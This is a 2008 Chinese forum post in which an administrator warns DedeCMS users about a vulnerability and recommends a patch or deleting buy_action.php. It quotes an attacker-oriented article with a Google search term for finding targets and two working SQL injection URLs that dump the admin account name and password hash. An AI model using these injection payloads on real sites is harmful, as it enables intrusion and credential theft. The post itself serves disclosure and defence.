» 游客:  注册 | 登录 | 会员 | 社区银行 | 股票中心 | 帮助  骤雨打新荷 » 『技术资源』 » 『经验交流』 » 所有使用dedecms的兄弟们注意了   作者: 标题: 所有使用dedecms的兄弟们注意了 上一主题 | 下一主题 txfzq 管理员 积分 33428 发帖 13147 注册 2005-5-26 状态 离线 #1  所有使用dedecms的兄弟们注意了 今天在baidu搜到一个关于dedecms漏洞的文章，描述如下   Quote: Power by DedeCms漏洞,都去拿SHELL把! 首先在 GOOGLE搜Power by DedeCms 漏洞现象：注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/* 爆管理员密码 /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/* 建议用dedecms做站的弟兄们，在后台关闭会员功能并删除 buy_action.php文件，或者下载dedecms最新补丁 DedeCms 4.x 会员中心补丁 http://bbs.dedecms.com/read.php?tid=11338 2008-1-16 17:29 可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题 论坛跳转: 公共事务区  > 『论坛公告』      > 『新会员报道处』  > 『投诉建议』  > 『版主申请』 软件交流区  > 『系统软件』  > 『应用软件』  > 『电脑技术』 图片分享区  > 『东方美女』  > 『西洋风情』  > 『风景贴图』  > 『综合图库』  > 『原创自拍』 精品套图区  > 『美女图集』  > 『风光图集』  > 『其他图集』      > 『名家扫图』  > 『技术资源』      > 『经验交流』 影音下载区  > 『流行音乐』  > 『特色音乐』  > 『影音下载』  > 『在线影音』 休闲交流区  > 『美文赏析』      > 『图说心语』      > 『懿如既往』  > 『时尚会馆』      > 『美容护肤』  > 『健康美食』      > 『茶语心声』  > 『心情驿站』 论坛版务区    [ 联系我们 - 骤雨打新荷 ] Powered by Discuz! 2.5 © 2001-2005 Comsenz Technology Ltd.